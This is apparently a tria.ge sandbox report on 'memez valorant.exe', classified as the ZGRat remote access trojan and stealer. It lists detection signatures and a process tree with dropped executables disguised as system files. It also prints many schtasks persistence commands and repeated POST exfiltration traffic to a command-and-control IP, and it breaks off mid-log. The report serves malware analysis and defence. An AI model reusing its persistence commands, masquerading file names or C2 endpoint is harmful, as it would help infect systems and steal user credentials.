Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

memez valorant.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/05/2024, 08:02 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    memez valorant.exe

  • Size

    6.0MB

  • MD5

    8b79741f93dfe2a98005fcedb8cc9e09

  • SHA1

    e5b9ae63c045248ee3e0810e73b80f5f853e8574

  • SHA256

    7fdc605f25e5374bad102386657bc0189ffa5ab62c3a9cb0fb35f1cf95befafc

  • SHA512

    a3b3831a1993544253ae966b08f6976be286cdfa8d8a26816ea1dda1b2ae22f91018ce0c3772615bf9679c684dadb13a629f4e4dfafaff2f3ebf3a17c1f66bf9

  • SSDEEP

    24576:aTbBv5rUleX5BM3YIzE0+l8T8/7Vzy8/PoUNjmo59k1UWAaL511wElDeQpx1Kh:sBnX5BWt8j9hdvKDfucz2

Score
10/10
zgratratspywarestealer

Malware Config

Signatures

  • Detect ZGRat V1 2 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\memez valorant.exe
    "C:\Users\Admin\AppData\Local\Temp\memez valorant.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1512
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\MsServerBrokerDhcpSvc\OwAS3ElMz3sl8CiEcBXAKJJu9viU7wMG8nRST90KHZpLy5Zk.vbe"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4160
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\MsServerBrokerDhcpSvc\seUT6SF2g6LubjHj.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Users\Admin\AppData\Roaming\MsServerBrokerDhcpSvc\WebSvc.exe
          "C:\Users\Admin\AppData\Roaming\MsServerBrokerDhcpSvc/WebSvc.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Windows directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1896
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CnAga65Iu2.bat"
            5⤵
              PID:1936
              • C:\Windows\system32\chcp.com
                chcp 65001
                6⤵
                  PID:1564
                • C:\Windows\system32\PING.EXE
                  ping -n 10 localhost
                  6⤵
                  • Runs ping.exe
                  PID:2348
                • C:\Users\Default\cmd.exe
                  "C:\Users\Default\cmd.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1164
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\smss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:5092
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Default User\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2880
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2456
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WebSvcW" /sc MINUTE /mo 5 /tr "'C:\Windows\addins\WebSvc.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3336
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WebSvc" /sc ONLOGON /tr "'C:\Windows\addins\WebSvc.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4852
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WebSvcW" /sc MINUTE /mo 8 /tr "'C:\Windows\addins\WebSvc.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2792
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Searches\csrss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2392
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Searches\csrss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4060
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Searches\csrss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1740
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\cmd.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3644
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default\cmd.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1528
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\cmd.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2124
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Users\Default\dwm.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3808
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default\dwm.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1136
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Users\Default\dwm.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3068

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        172.210.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.210.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        241.150.49.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        241.150.49.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        68.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        68.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-be
        GET
        https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
        Remote address:
        2.17.196.105:443
        Request
        GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
        host: www.bing.com
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-type: image/png
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        content-length: 1107
        date: Sat, 11 May 2024 08:03:54 GMT
        alt-svc: h3=":443"; ma=93600
        x-cdn-traceid: 0.65c41102.1715414634.8cb3adc
      • flag-us
        DNS
        105.196.17.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        105.196.17.2.in-addr.arpa
        IN PTR
        Response
        105.196.17.2.in-addr.arpa
        IN PTR
        a2-17-196-105deploystaticakamaitechnologiescom
      • flag-us
        DNS
        183.142.211.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.142.211.20.in-addr.arpa
        IN PTR
        Response
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 344
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:09 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 1364
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 384
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:10 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1024
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:10 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Content-Length: 4
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:11 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:12 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:13 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:15 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:16 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:17 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:18 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:19 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:20 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:22 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:23 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:24 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:25 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:26 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:28 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:29 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:30 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:31 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:32 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:34 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1288
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:35 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:36 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:37 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:38 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
